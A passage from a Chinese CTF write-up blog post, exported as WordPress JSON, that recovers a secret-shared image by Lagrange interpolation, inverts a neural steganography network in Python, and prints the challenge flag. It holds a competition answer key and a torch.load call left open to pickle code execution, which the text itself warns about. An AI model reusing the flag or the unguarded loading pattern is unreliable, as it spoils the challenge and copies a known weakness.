continue<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;numerator = (numerator * (0 - xs&#91;j])) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;denominator = (denominator * (xs&#91;i] - xs&#91;j])) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;li0 = (numerator * modInverse(denominator, mod)) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;coeffs.append(li0)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;recovered = np.zeros(num_pixels, dtype=int)<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;term = (Y&#91;i] * coeffs&#91;i]) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;recovered = (recovered + term) % mod<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;recovered = recovered.astype(np.uint8).reshape(shape)<br> &nbsp; &nbsp;Image.fromarray(recovered).save(\"recovered_secret.png\")<br> &nbsp; &nbsp;print(\"Saved recovered_secret.png\")<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u540e\u5f97\u5230 <code>recovered_secret.png<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u7b2c\u4e8c\u6b65\uff1aAI \u6a21\u578b\u63d0\u53d6 Flag<\/strong><\/p>\n\n\n\n<p><strong>\u6a21\u578b\u5206\u6790<\/strong><\/p>\n\n\n\n<p><code>Steg<\/code> \u6587\u4ef6\u5939\u4e2d\u7684\u4ee3\u7801\u5c55\u793a\u4e86\u4e00\u4e2a\u57fa\u4e8e <strong>Invertible Neural Network (INN)<\/strong> \u7684\u67b6\u6784\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u7ed3\u6784<\/strong>\uff1a\u6a21\u578b\u7531\u591a\u4e2a <code>INV_block<\/code> \u7ec4\u6210\uff0c\u8fd9\u662f\u4e00\u79cd\u7c7b\u4f3c RealNVP \u7684\u8026\u5408\u5c42\u7ed3\u6784\uff0c\u5177\u6709\u5929\u7136\u7684\u53ef\u9006\u6027\u3002<\/li>\n\n\n\n<li><strong>\u524d\u5411\u8fc7\u7a0b (Encode)<\/strong>\uff1a\u8f93\u5165 <code>Cover<\/code> \u548c <code>Payload<\/code>\uff0c\u8f93\u51fa <code>Stego<\/code> (y1) \u548c <code>Residual<\/code> (y2)\u3002\u4ee3\u7801\u4e2d\u53ea\u4fdd\u5b58\u4e86 <code>y1<\/code> (<code>secret.png<\/code>)\uff0c\u4e22\u5f03\u4e86 
<code>y2<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u9006\u5411\u8fc7\u7a0b (Decode)<\/strong>\uff1a\u4e3a\u4e86\u63d0\u53d6\u4fe1\u606f\uff0c\u6211\u4eec\u9700\u8981\u5c06 <code>y1<\/code> \u8f93\u5165\u7f51\u7edc\u7684\u9006\u53d8\u6362\u4e2d\u3002<\/li>\n\n\n\n<li><strong>\u7f3a\u5931\u7684 y2<\/strong>\uff1a\u7531\u4e8e <code>y2<\/code> \u4e22\u5931\uff0c\u4f46\u5728\u8bad\u7ec3\u826f\u597d\u7684\u9690\u5199\u7f51\u7edc\u4e2d\uff0c<code>y2<\/code> \u901a\u5e38\u670d\u4ece\u9ad8\u65af\u5206\u5e03\u6216\u63a5\u8fd1\u96f6\u3002\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u7528\u5168 0 \u6216\u968f\u673a\u566a\u58f0\u4ee3\u66ff <code>y2<\/code> \u8fdb\u884c\u9006\u53d8\u6362\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u9006\u5411\u811a\u672c\u5b9e\u73b0<\/strong><\/p>\n\n\n\n<p>\u539f\u59cb\u4ee3\u7801\u6ca1\u6709\u63d0\u4f9b <code>inverse<\/code> \u65b9\u6cd5\uff0c\u6211\u4eec\u9700\u8981\u5229\u7528 INN \u7684\u6570\u5b66\u6027\u8d28\u624b\u52a8\u5b9e\u73b0\u9006\u53d8\u6362\u3002\u53e6\u5916\uff0c\u811a\u672c\u7528 <code>torch.load<\/code> \u52a0\u8f7d\u9898\u76ee\u7ed9\u7684\u6743\u91cd\u6587\u4ef6\uff0c\u5b83\u9ed8\u8ba4\u901a\u8fc7 pickle \u53cd\u5e8f\u5217\u5316\uff0c\u7b49\u4e8e\u6267\u884c\u6587\u4ef6\u4e2d\u7684\u4efb\u610f\u4ee3\u7801\uff1b\u5e94\u52a0 <code>weights_only=True<\/code> \u6216\u5728\u9694\u79bb\u73af\u5883\u4e2d\u8fd0\u884c\u3002<\/p>\n\n\n\n<p><code>INV_block<\/code> \u7684\u524d\u5411\u8ba1\u7b97\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$$<br>y_1 = x_1 + \\phi(x_2) \\\\ s_1, t_1 = \\rho(y_1), \\eta(y_1) \\\\ y_2 = e(s_1) \\cdot x_2 + t_1<br>$$<\/code><\/pre>\n\n\n\n<p>\u63a8\u5bfc\u9006\u53d8\u6362\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$$<br>x_2 = (y_2 - t_1) \\cdot e(-s_1) \\\\ x_1 = y_1 - \\phi(x_2)<br>$$<\/code><\/pre>\n\n\n\n<p><strong>\u6570\u636e\u63d0\u53d6\u4e0e\u7ea0\u9519<\/strong><\/p>\n\n\n\n<p>\u8fd8\u539f\u51fa\u7684 Payload \u56fe\u7247\u770b\u8d77\u6765\u662f\u566a\u58f0\uff0c\u4f46\u5b9e\u9645\u4e0a\u5305\u542b\u4e86\u7f16\u7801\u540e\u7684\u6bd4\u7279\u6d41\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u67e5\u770b <code>utils.py<\/code>\uff0c\u53d1\u73b0 <code>make_payload<\/code> 
\u5c06\u6d88\u606f\u6bd4\u7279\u6d41\u91cd\u590d\u586b\u5145\u5230\u6574\u4e2a\u56fe\u7247\u4e2d\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u9700\u8981\u627e\u5230\u91cd\u590d\u5468\u671f\uff0c\u5bf9\u591a\u4e2a\u5468\u671f\u7684\u4fe1\u53f7\u53d6\u5e73\u5747\u4ee5\u6d88\u9664\u566a\u58f0\uff08\u56e0\u4e3a\u6211\u4eec\u731c\u6d4b\u7684 <code>y2<\/code> \u4e0d\u5b8c\u5168\u51c6\u786e\uff0c\u4f1a\u5f15\u5165\u566a\u58f0\uff09\u3002<\/li>\n\n\n\n<li>\u6700\u540e\u4f7f\u7528 Reed-Solomon (<code>reedsolo<\/code>) \u89e3\u7801\u5e76 Zlib \u89e3\u538b\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u63d0\u53d6\u811a\u672c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import sys<br>import os<br>import torch<br>import numpy as np<br>from PIL import Image<br>import torchvision.transforms as T<br>import zlib<br>from reedsolo import RSCodec<br><br># \u5047\u8bbe Steg \u6587\u4ef6\u5939\u5728\u5f53\u524d\u76ee\u5f55<br>sys.path.append(\"Steg\")<br>from model import Model<br>from block import INV_block<br>from net import simple_net<br>from utils import DWT, IWT, bits_to_bytearray, bytearray_to_text<br><br># 1. 
Monkey Patch: \u5b9e\u73b0\u9006\u53d8\u6362<br>def inv_block_inverse(self, x):<br>    split_size = self.channels * 4<br>    y1 = x.narrow(1, 0, split_size)<br>    y2 = x.narrow(1, split_size, split_size)<br>    <br>    s1, t1 = self.r(y1), self.y(y1)<br>    # x2 = (y2 - t1) \/ e(s1)<br>    x2 = (y2 - t1) \/ self.e(s1)<br>    t2 = self.f(x2)<br>    x1 = y1 - t2<br>    return torch.cat((x1, x2), 1)<br><br>INV_block.inverse = inv_block_inverse<br><br>def net_inverse(self, x):<br>    out = x<br>    # \u9006\u5e8f\u6267\u884c block<br>    for i in range(8, 0, -1):<br>        out = getattr(self, f'inv{i}').inverse(out)<br>    return out<br><br>simple_net.inverse = net_inverse<br>Model.inverse = lambda self, x: self.model.inverse(x)<br><br>def solve_steg():<br>    # \u9002\u914d CPU<br>    device = torch.device(\"cpu\")<br>    if not torch.cuda.is_available():<br>        torch.Tensor.cuda = lambda self, *args, **kwargs: self<br>        torch.nn.Module.cuda = lambda self, *args, **kwargs: self<br><br>    # \u52a0\u8f7d\u6a21\u578b<br>    model = Model(cuda=False)<br>    state = torch.load(os.path.join(\"Steg\", \"misuha.taki\"), map_location=device)<br>    # \u4fee\u6b63 key<br>    new_state = {k: v for k, v in state&#91;'net'].items() if 'tmp_var' not in k}<br>    model.load_state_dict(new_state)<br>    model.eval()<br><br>    dwt = DWT().to(device)<br>    iwt = IWT().to(device)<br><br>    # \u52a0\u8f7d\u6062\u590d\u7684\u56fe\u7247<br>    img = Image.open(\"recovered_secret.png\").convert('RGB')<br>    img_tensor = T.ToTensor()(img).unsqueeze(0).to(device)<br>    <br>    # DWT \u53d8\u6362<br>    y1 = dwt(img_tensor)<br>    <br>    # \u731c\u6d4b y2 \u4e3a\u5168 0<br>    z = torch.zeros_like(y1).to(device)<br>    inp = torch.cat((y1, z), dim=1)<br>    <br>    # \u9006\u5411\u63a8\u7406<br>    with torch.no_grad():<br>        out = model.inverse(inp)<br>    <br>    # \u63d0\u53d6 Payload \u90e8\u5206 (\u540e\u534a\u90e8\u5206\u901a\u9053)<br>    x2_rec = out.narrow(1, 
12, 12)<br>    payload_img = iwt(x2_rec)<br>    <br>    # \u8f6c\u4e3a\u6bd4\u7279\u6d41<br>    bits_float = payload_img.flatten().cpu().numpy()<br>    bits_raw = (bits_float &gt; 0.5).astype(int)<br>    <br>    # \u5bfb\u627e\u5468\u671f\u5e76\u5e73\u5747<br>    # \u7ecf\u8fc7\u5206\u6790\u5c1d\u8bd5\uff0c\u5468\u671f\u7ea6\u4e3a 1376<br>    L = 1376 <br>    num_periods = len(bits_float) \/\/ L<br>    bits_reshaped = bits_float&#91;:num_periods * L].reshape((num_periods, L))<br>    bits_avg = bits_reshaped.mean(axis=0)<br>    bits_clean = (bits_avg &gt; 0.5).astype(int)<br>    <br>    # \u89e3\u7801<br>    rs = RSCodec(128) # \u5bf9\u5e94 utils.py \u4e2d\u7684\u8bbe\u7f6e<br>    b = bits_to_bytearray(bits_clean)<br>    try:<br>        decoded = rs.decode(b)&#91;0]<br>        text = zlib.decompress(decoded)<br>        print(f\"Flag: {text}\")<br>    except Exception as e:<br>        print(f\"Error: {e}\")<br><br>if __name__ == \"__main__\":<br>    solve_steg()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u4e0a\u8ff0\u811a\u672c\uff0c\u6210\u529f\u89e3\u51fa Flag\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: b'flag{Sh4r3_S3reCTTt_wiTh_Ai_H@@@@}'<\/code><\/pre>\n\n\n\n<p>\u6362flag\u5934\u4e3aISCTF\u5373\u53ef<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>NSSCTF [2021 \u9e64\u57ce\u676f]littleof [LitCTF 2023]\u53e3\u7b97\u9898\u5361 [WUSTCTF 20 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-653","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=653"}],"version-history":[{"count":1,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653\/revisions"}],"predecessor-version":[{"id":714,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/653\/revisions\/714"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=653"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}